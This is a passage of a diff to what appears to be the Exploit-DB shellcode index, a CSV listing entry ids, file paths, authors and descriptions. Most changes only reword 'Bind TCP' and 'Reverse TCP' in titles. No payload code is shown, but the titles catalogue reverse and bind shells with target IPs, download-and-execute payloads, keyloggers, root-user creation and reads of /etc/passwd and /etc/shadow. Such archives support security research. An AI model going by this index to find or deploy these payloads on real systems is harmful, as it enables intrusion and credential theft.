(4444/TCP) Shell Shellcode (357 bytes)",2016-09-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86 +29436,shellcodes/linux_mips/29436.asm,"Linux/MIPS (Little Endian) - Reverse (192.168.1.177:31337/TCP) Shell (/bin/sh) Shellcode (200 bytes)",2013-11-04,"Jacob Holcomb",shellcode,linux_mips +40352,shellcodes/windows_x86/40352.c,"Windows/x86 (7) - Bind (4444/TCP) Shell Shellcode (357 bytes)",2016-09-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86 33836,shellcodes/windows/33836.c,"Windows - Add Administrator User (BroK3n/BroK3n) + Null-Free Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",shellcode,windows 34060,shellcodes/linux_x86/34060.c,"Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes)",2014-07-14,ZadYree,shellcode,linux_x86 34262,shellcodes/linux_x86/34262.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",shellcode,linux_x86 34592,shellcodes/linux_x86/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",shellcode,linux_x86 -34667,shellcodes/linux_x86-64/34667.c,"Linux/x64 - Reverse TCP (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes)",2014-09-15,MadMouse,shellcode,linux_x86-64 +34667,shellcodes/linux_x86-64/34667.c,"Linux/x64 - Reverse (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes)",2014-09-15,MadMouse,shellcode,linux_x86-64 34778,shellcodes/linux_x86/34778.c,"Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",shellcode,linux_x86 35205,shellcodes/linux_x86-64/35205.asm,"Linux/x64 - execve(_/bin/sh\0__NULL_NULL) + Position Independent + Alphanumeric Shellcode (87 bytes)",2014-11-10,Breaking.Technology,shellcode,linux_x86-64 35519,shellcodes/linux_x86/35519.c,"Linux/x86 - rmdir() Shellcode (37 bytes)",2014-12-11,kw4,shellcode,linux_x86 -35586,shellcodes/linux_x86-64/35586.c,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64 -35587,shellcodes/linux_x86-64/35587.c,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64 +35586,shellcodes/linux_x86-64/35586.c,"Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64 +35587,shellcodes/linux_x86-64/35587.c,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64 35793,shellcodes/windows_x86/35793.txt,"Windows/x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86 35794,shellcodes/windows_x86-64/35794.txt,"Windows/x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86-64 35868,shellcodes/linux_mips/35868.c,"Linux/MIPS - execve(/bin/sh) Shellcode (36 bytes)",2015-01-22,Sanguine,shellcode,linux_mips @@ -482,8 +482,8 @@ id,file,description,date,author,type,platform 36393,shellcodes/linux_x86/36393.c,"Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86 36394,shellcodes/linux_x86/36394.c,"Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Obfuscated Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86 36395,shellcodes/linux_x86/36395.c,"Linux/x86 - execve(/bin/sh) + Obfuscated Shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86 -36397,shellcodes/linux_x86/36397.c,"Linux/x86 - Reverse TCP (192.168.1.133:33333/TCP) Shell (/bin/sh) Shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86 -36398,shellcodes/linux_x86/36398.c,"Linux/x86 - Bind TCP (33333/TCP) Shell (/bin/sh) Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86 +36397,shellcodes/linux_x86/36397.c,"Linux/x86 - Reverse (192.168.1.133:33333/TCP) Shell (/bin/sh) Shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86 +36398,shellcodes/linux_x86/36398.c,"Linux/x86 - Bind (33333/TCP) Shell (/bin/sh) Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86 36637,shellcodes/linux_x86/36637.c,"Linux/x86 - Disable ASLR Security Shellcode (84 bytes)",2015-04-03,"Mohammad Reza Ramezani",shellcode,linux_x86 36672,shellcodes/linux_x86/36672.asm,"Linux/x86 - Egghunter (0x5159) Shellcode (20 bytes)",2015-04-08,"Paw Petersen",shellcode,linux_x86 36673,shellcodes/generator/36673.py,"Linux/x86 - Typewriter Shellcode (Generator)",2015-04-08,"Paw Petersen",shellcode,generator @@ -495,7 +495,7 @@ id,file,description,date,author,type,platform 36781,shellcodes/generator/36781.py,"Linux/x86 - 'Followtheleader' Custom execve() Shellcode (Encoder/Decoder) (Generator)",2015-04-17,"Konstantinos Alexiou",shellcode,generator 36857,shellcodes/linux_x86/36857.c,"Linux/x86 - execve(/bin/sh) + Push Method Shellcode (21 bytes)",2015-04-29,noviceflux,shellcode,linux_x86 36858,shellcodes/linux_x86-64/36858.c,"Linux/x64 - execve(/bin/sh) Via Push Shellcode (23 bytes)",2015-04-29,noviceflux,shellcode,linux_x86-64 -36921,shellcodes/linux_x86/36921.c,"Linux/x86 - Bind TCP (17771/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (58 bytes)",2015-05-06,"Oleg Boytsev",shellcode,linux_x86 +36921,shellcodes/linux_x86/36921.c,"Linux/x86 - Bind (17771/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (58 bytes)",2015-05-06,"Oleg Boytsev",shellcode,linux_x86 36908,shellcodes/linux_x86/36908.c,"Linux/x86 - exit(0) Shellcode (6 bytes)",2015-05-04,"Febriyanto Nugroho",shellcode,linux_x86 37069,shellcodes/linux_x86/37069.c,"Linux/x86 - execve(/bin/sh) Shellcode (26 bytes)",2015-05-20,"Reza Behzadpour",shellcode,linux_x86 37251,shellcodes/linux_x86/37251.asm,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (1)",2015-06-10,B3mB4m,shellcode,linux_x86 @@ -503,7 +503,7 @@ id,file,description,date,author,type,platform 37289,shellcodes/linux_x86/37289.txt,"Linux/x86 - Shutdown(init 0) Shellcode (30 bytes)",2015-06-15,B3mB4m,shellcode,linux_x86 37297,shellcodes/linux_x86/37297.txt,"Linux/x86 - Read /etc/passwd Shellcode (58 bytes)",2015-06-16,B3mB4m,shellcode,linux_x86 37358,shellcodes/linux_x86/37358.c,"Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86 -37359,shellcodes/linux_x86/37359.c,"Linux/x86 - Bind TCP (5555/TCP) Netcat Shell Shellcode (60 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86 +37359,shellcodes/linux_x86/37359.c,"Linux/x86 - Bind (5555/TCP) Netcat Shell Shellcode (60 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86 37362,shellcodes/linux_x86-64/37362.c,"Linux/x64 - execve(/bin/sh) + Null-Free Shellcode (30 bytes)",2015-06-24,"Bill Borskey",shellcode,linux_x86-64 37365,shellcodes/linux_x86/37365.c,"Linux/x86 - Download File + Execute Shellcode",2015-06-24,B3mB4m,shellcode,linux_x86 37366,shellcodes/linux_x86/37366.c,"Linux/x86 - Reboot() Shellcode (28 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86 @@ -520,91 +520,91 @@ id,file,description,date,author,type,platform 37762,shellcodes/linux_x86/37762.py,"Linux/x86 - execve(/bin/sh) + ROL/ROR Encoded Shellcode (Generator)",2015-08-12,"Anastasios Monachos",shellcode,linux_x86 37895,shellcodes/windows_x86-64/37895.asm,"Windows/x64 (2003) - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",shellcode,windows_x86-64 38065,shellcodes/osx/38065.txt,"OSX/x64 - execve(/bin/sh) + Null-Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",shellcode,osx -38075,shellcodes/system_z/38075.txt,"Mainframe/System Z - Bind TCP (12345/TCP) Shell + Null-Free Shellcode (2488 bytes)",2015-09-02,"Bigendian Smalls",shellcode,system_z +38075,shellcodes/system_z/38075.txt,"Mainframe/System Z - Bind (12345/TCP) Shell + Null-Free Shellcode (2488 bytes)",2015-09-02,"Bigendian Smalls",shellcode,system_z 38088,shellcodes/linux_x86/38088.c,"Linux/x86 - execve(/bin/bash) Shellcode (31 bytes)",2015-09-06,"Ajith Kp",shellcode,linux_x86 38094,shellcodes/generator/38094.c,"Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)",2015-09-07,"Ajith Kp",shellcode,generator 38116,shellcodes/linux_x86/38116.c,"Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) Shellcode (75 bytes)",2015-09-09,"Ajith Kp",shellcode,linux_x86 -38126,shellcodes/osx/38126.c,"OSX/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",shellcode,osx +38126,shellcodes/osx/38126.c,"OSX/x64 - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",shellcode,osx 38150,shellcodes/linux_x86-64/38150.txt,"Linux/x64 - execve(/bin/sh) Shellcode (34 bytes)",2015-09-11,"Fanda Uchytil",shellcode,linux_x86-64 -38194,shellcodes/android/38194.c,"Google Android - Bind TCP (1035/TCP) Telnetd Shell + Environment/Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",shellcode,android +38194,shellcodes/android/38194.c,"Google Android - Bind (1035/TCP) Telnetd Shell + Environment/Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",shellcode,android 38239,shellcodes/linux_x86-64/38239.asm,"Linux/x64 - execve() Shellcode (22 bytes)",2015-09-18,d4sh&r,shellcode,linux_x86-64 -38469,shellcodes/linux_x86-64/38469.c,"Linux/x64 - Bind TCP (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes)",2015-10-15,d4sh&r,shellcode,linux_x86-64 +38469,shellcodes/linux_x86-64/38469.c,"Linux/x64 - Bind (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes)",2015-10-15,d4sh&r,shellcode,linux_x86-64 38708,shellcodes/linux_x86-64/38708.asm,"Linux/x64 - Egghunter (0x6b634068) Shellcode (24 bytes)",2015-11-16,d4sh&r,shellcode,linux_x86-64 38815,shellcodes/linux_x86-64/38815.c,"Linux/x64 - execve() + Polymorphic Shellcode (31 bytes)",2015-11-25,d4sh&r,shellcode,linux_x86-64 38959,shellcodes/generator/38959.py,"Windows (XP < 10) - Command Generator WinExec() + Null-Free Shellcode (Generator)",2015-12-13,B3mB4m,shellcode,generator -39149,shellcodes/linux_x86-64/39149.c,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2016-01-01,Scorpion_,shellcode,linux_x86-64 -39152,shellcodes/linux_x86-64/39152.c,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes)",2016-01-02,"Sathish kumar",shellcode,linux_x86-64 +39149,shellcodes/linux_x86-64/39149.c,"Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2016-01-01,Scorpion_,shellcode,linux_x86-64 +39152,shellcodes/linux_x86-64/39152.c,"Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes)",2016-01-02,"Sathish kumar",shellcode,linux_x86-64 39160,shellcodes/linux_x86/39160.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (1)",2016-01-04,"Dennis 'dhn' Herrmann",shellcode,linux_x86 -39185,shellcodes/linux_x86-64/39185.c,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)",2016-01-06,"Sathish kumar",shellcode,linux_x86-64 +39185,shellcodes/linux_x86-64/39185.c,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)",2016-01-06,"Sathish kumar",shellcode,linux_x86-64 39203,shellcodes/linux_x86-64/39203.c,"Linux/x64 - Egghunter (0x50905090) Shellcode (18 bytes)",2016-01-08,"Sathish kumar",shellcode,linux_x86-64 39204,shellcodes/linux_x86/39204.c,"Linux/x86 - Egghunter (0x4f904790) Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",shellcode,linux_x86 39312,shellcodes/linux_x86-64/39312.c,"Linux/x64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes)",2016-01-25,"Sathish kumar",shellcode,linux_x86-64 -39336,shellcodes/linux/39336.c,"Linux x86/x64 - Reverse TCP (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes)",2016-01-27,B3mB4m,shellcode,linux -39337,shellcodes/linux/39337.c,"Linux x86/x64 - Bind TCP (4444/TCP) Shell Shellcode (251 bytes)",2016-01-27,B3mB4m,shellcode,linux +39336,shellcodes/linux/39336.c,"Linux x86/x64 - Reverse (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes)",2016-01-27,B3mB4m,shellcode,linux +39337,shellcodes/linux/39337.c,"Linux x86/x64 - Bind (4444/TCP) Shell Shellcode (251 bytes)",2016-01-27,B3mB4m,shellcode,linux 39338,shellcodes/linux/39338.c,"Linux x86/x64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,shellcode,linux -39383,shellcodes/linux_x86-64/39383.c,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes)",2016-01-29,"Sathish kumar",shellcode,linux_x86-64 -39388,shellcodes/linux_x86-64/39388.c,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64 +39383,shellcodes/linux_x86-64/39383.c,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes)",2016-01-29,"Sathish kumar",shellcode,linux_x86-64 +39388,shellcodes/linux_x86-64/39388.c,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64 39389,shellcodes/linux_x86/39389.c,"Linux/x86 - Download File + Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,shellcode,linux_x86 39390,shellcodes/linux_x86-64/39390.c,"Linux/x64 - execve() Stack + Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64 -39496,shellcodes/arm/39496.c,"Linux/ARM - Reverse TCP (10.0.0.10:1337/TCP) Shell (/bin/sh) Shellcode (95 bytes)",2016-02-26,Xeon,shellcode,arm +39496,shellcodes/arm/39496.c,"Linux/ARM - Reverse (10.0.0.10:1337/TCP) Shell (/bin/sh) Shellcode (95 bytes)",2016-02-26,Xeon,shellcode,arm 39519,shellcodes/windows_x86/39519.c,"Windows/x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",shellcode,windows_x86 -39578,shellcodes/linux_x86-64/39578.c,"Linux/x64 - Reverse TCP (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",shellcode,linux_x86-64 +39578,shellcodes/linux_x86-64/39578.c,"Linux/x64 - Reverse (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",shellcode,linux_x86-64 39617,shellcodes/linux_x86-64/39617.c,"Linux/x64 - execve(/bin/sh) Shellcode (26 bytes)",2016-03-24,"Ajith Kp",shellcode,linux_x86-64 39624,shellcodes/linux_x86-64/39624.c,"Linux/x64 - execve(/bin/sh) Shellcode (25 bytes) (1)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64 39625,shellcodes/linux_x86-64/39625.c,"Linux/x64 - execve(/bin/bash) Shellcode (33 bytes)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64 -39684,shellcodes/linux_x86-64/39684.c,"Linux/x64 - Bind TCP (5600/TCP) Shell Shellcode (81 bytes)",2016-04-11,"Ajith Kp",shellcode,linux_x86-64 +39684,shellcodes/linux_x86-64/39684.c,"Linux/x64 - Bind (5600/TCP) Shell Shellcode (81 bytes)",2016-04-11,"Ajith Kp",shellcode,linux_x86-64 39700,shellcodes/linux_x86-64/39700.c,"Linux/x64 - Read /etc/passwd Shellcode (65 bytes)",2016-04-15,"Ajith Kp",shellcode,linux_x86-64 -39718,shellcodes/linux_x86-64/39718.c,"Linux/x64 - Bind TCP (5600/TCP) Shell Shellcode (86 bytes)",2016-04-21,"Ajith Kp",shellcode,linux_x86-64 +39718,shellcodes/linux_x86-64/39718.c,"Linux/x64 - Bind (5600/TCP) Shell Shellcode (86 bytes)",2016-04-21,"Ajith Kp",shellcode,linux_x86-64 40094,shellcodes/windows_x86/40094.c,"Windows/x86 - URLDownloadToFileA(http://192.168.86.130/sample.exe) + SetFileAttributesA(pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",shellcode,windows_x86 -39722,shellcodes/linux_x86/39722.c,"Linux/x86 - Reverse TCP (::ffff:192.168.64.129:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,linux_x86 -39723,shellcodes/linux_x86/39723.c,"Linux/x86 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (1250 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,linux_x86 -39728,shellcodes/generator/39728.py,"Linux/x64 - Bind TCP Shell Shellcode (Generator)",2016-04-25,"Ajith Kp",shellcode,generator +39722,shellcodes/linux_x86/39722.c,"Linux/x86 - Reverse (::ffff:192.168.64.129:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,linux_x86 +39723,shellcodes/linux_x86/39723.c,"Linux/x86 - Bind (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (1250 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,linux_x86 +39728,shellcodes/generator/39728.py,"Linux/x64 - Bind (/TCP) Shell Shellcode (Generator)",2016-04-25,"Ajith Kp",shellcode,generator 39731,shellcodes/windows/39731.c,"Windows - Keylogger to File (./log.bin) + Null-Free Shellcode (431 bytes)",2016-04-25,Fugu,shellcode,windows 39754,shellcodes/windows_x86/39754.txt,"Windows/x86 (.Net Framework) - Execute Native x86 Shellcode",2016-05-02,Jacky5112,shellcode,windows_x86 -39758,shellcodes/linux_x86-64/39758.c,"Linux/x64 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64 -39763,shellcodes/linux_x86-64/39763.c,"Linux/x64 - Reverse TCP (192.168.209.131:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64 +39758,shellcodes/linux_x86-64/39758.c,"Linux/x64 - Bind (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64 +39763,shellcodes/linux_x86-64/39763.c,"Linux/x64 - Reverse (192.168.209.131:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64 39794,shellcodes/windows/39794.c,"Windows - Keylogger to File (%TEMP%/log.bin) + Null-Free Shellcode (601 bytes)",2016-05-10,Fugu,shellcode,windows -39815,shellcodes/generator/39815.c,"Linux/x86 - Bind TCP (1234/TCP) Shell (/bin/sh) Shellcode (87 bytes) (Generator)",2016-05-16,JollyFrogs,shellcode,generator +39815,shellcodes/generator/39815.c,"Linux/x86 - Bind (1234/TCP) Shell (/bin/sh) Shellcode (87 bytes) (Generator)",2016-05-16,JollyFrogs,shellcode,generator 39847,shellcodes/linux_x86-64/39847.c,"Linux/x64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64 -39851,shellcodes/linux_x86/39851.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/bash) Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",shellcode,linux_x86 +39851,shellcodes/linux_x86/39851.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/bash) Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",shellcode,linux_x86 39869,shellcodes/linux_x86-64/39869.c,"Linux/x64 - execve() + XOR Encoded Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64 39885,shellcodes/multiple/39885.c,"BSD / Linux / Windows - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,shellcode,multiple 39900,shellcodes/windows_x86/39900.c,"Windows/x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",shellcode,windows_x86 -39901,shellcodes/linux_x86/39901.c,"Linux/x86 - Bind TCP (13337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (56 bytes)",2016-06-07,sajith,shellcode,linux_x86 +39901,shellcodes/linux_x86/39901.c,"Linux/x86 - Bind (13337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (56 bytes)",2016-06-07,sajith,shellcode,linux_x86 39914,shellcodes/windows_x86/39914.c,"Windows/x86 - system(systeminfo) Shellcode (224 bytes)",2016-06-10,"Roziul Hasan Khan Shifat",shellcode,windows_x86 39979,shellcodes/windows/39979.c,"Windows (XP < 10) - Download File + Execute Shellcode",2016-06-20,B3mB4m,shellcode,windows 40005,shellcodes/windows_x86/40005.c,"Windows/x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)",2016-06-22,"Roziul Hasan Khan Shifat",shellcode,windows_x86 40026,shellcodes/linux_x86/40026.txt,"Linux/x86 - execve(/bin/sh) + ASLR Bruteforce Shellcode",2016-06-27,"Pawan Lal",shellcode,linux_x86 -40029,shellcodes/linux_x86-64/40029.c,"Linux/x64 - Reverse TCP (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64 -40052,shellcodes/linux_x86-64/40052.c,"Linux/x64 - Bind TCP Netcat Shell + Null-Free Shellcode (64 bytes)",2016-07-04,Kyzer,shellcode,linux_x86-64 -40056,shellcodes/linux_x86/40056.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (98 bytes)",2016-07-04,sajith,shellcode,linux_x86 -40061,shellcodes/linux_x86-64/40061.c,"Linux/x64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + fork() + IPv4/6 + Password + Null-Free Shellcode (176 bytes)",2016-07-06,Kyzer,shellcode,linux_x86-64 -40075,shellcodes/linux_x86/40075.c,"Linux/x86 - Reverse TCP (192.168.227.129:4444/TCP) Shell (/bin/sh) Shellcode (75 bytes)",2016-07-08,sajith,shellcode,linux_x86 -40079,shellcodes/linux_x86-64/40079.c,"Linux/x64 - Reverse TCP (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes)",2016-07-11,Kyzer,shellcode,linux_x86-64 -40110,shellcodes/linux_x86/40110.c,"Linux/x86 - Reverse TCP (127.1.1.1:10) Xterm Shell Shellcode (68 bytes)",2016-07-13,RTV,shellcode,linux_x86 -40122,shellcodes/linux_x86-64/40122.c,"Linux/x64 - Bind TCP (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,shellcode,linux_x86-64 -40128,shellcodes/linux_crisv32/40128.c,"Linux/CRISv32 Axis Communication - Reverse TCP (192.168.57.1:443/TCP) Shell (/bin/sh) Shellcode (189 bytes)",2016-07-20,bashis,shellcode,linux_crisv32 +40029,shellcodes/linux_x86-64/40029.c,"Linux/x64 - Reverse (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64 +40052,shellcodes/linux_x86-64/40052.c,"Linux/x64 - Bind (/TCP) Netcat Shell + Null-Free Shellcode (64 bytes)",2016-07-04,Kyzer,shellcode,linux_x86-64 +40056,shellcodes/linux_x86/40056.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (98 bytes)",2016-07-04,sajith,shellcode,linux_x86 +40061,shellcodes/linux_x86-64/40061.c,"Linux/x64 - Bind (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + fork() + IPv4/6 + Password + Null-Free Shellcode (176 bytes)",2016-07-06,Kyzer,shellcode,linux_x86-64 +40075,shellcodes/linux_x86/40075.c,"Linux/x86 - Reverse (192.168.227.129:4444/TCP) Shell (/bin/sh) Shellcode (75 bytes)",2016-07-08,sajith,shellcode,linux_x86 +40079,shellcodes/linux_x86-64/40079.c,"Linux/x64 - Reverse (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes)",2016-07-11,Kyzer,shellcode,linux_x86-64 +40110,shellcodes/linux_x86/40110.c,"Linux/x86 - Reverse (127.1.1.1:10/TCP) Xterm Shell Shellcode (68 bytes)",2016-07-13,RTV,shellcode,linux_x86 +40122,shellcodes/linux_x86-64/40122.c,"Linux/x64 - Bind (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,shellcode,linux_x86-64 +40128,shellcodes/linux_crisv32/40128.c,"Linux/CRISv32 Axis Communication - Reverse (192.168.57.1:443/TCP) Shell (/bin/sh) Shellcode (189 bytes)",2016-07-20,bashis,shellcode,linux_crisv32 40131,shellcodes/linux_x86/40131.c,"Linux/x86 - execve(/bin/sh) Shellcode (19 bytes)",2016-07-20,sajith,shellcode,linux_x86 -40139,shellcodes/linux_x86-64/40139.c,"Linux/x64 - Reverse TCP (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes)",2016-07-21,Kyzer,shellcode,linux_x86-64 +40139,shellcodes/linux_x86-64/40139.c,"Linux/x64 - Reverse (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes)",2016-07-21,Kyzer,shellcode,linux_x86-64 40175,shellcodes/windows_x86/40175.c,"Windows/x86 (7) - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",shellcode,windows_x86 -40179,shellcodes/linux_x86/40179.c,"Linux/x86 - Bind TCP/UDP (98/TCP + UDP) Netcat Shell Shellcode (44/52 bytes)",2016-07-29,Kyzer,shellcode,linux_x86 -40222,shellcodes/linux_x86/40222.c,"Linux/x86 - Bind TCP (9090/TCP) Shell (/bin/zsh) Shellcode (96 bytes)",2016-08-10,thryb,shellcode,linux_x86 -40223,shellcodes/linux_x86/40223.c,"Linux/x86 - Reverse TCP (127.255.255.254:9090/TCP) Shell (/bin/zsh) Shellcode (80 bytes)",2016-08-10,thryb,shellcode,linux_x86 +40179,shellcodes/linux_x86/40179.c,"Linux/x86 - Bind (98/TCP + UDP) Netcat Shell Shellcode (44/52 bytes)",2016-07-29,Kyzer,shellcode,linux_x86 +40222,shellcodes/linux_x86/40222.c,"Linux/x86 - Bind (9090/TCP) Shell (/bin/zsh) Shellcode (96 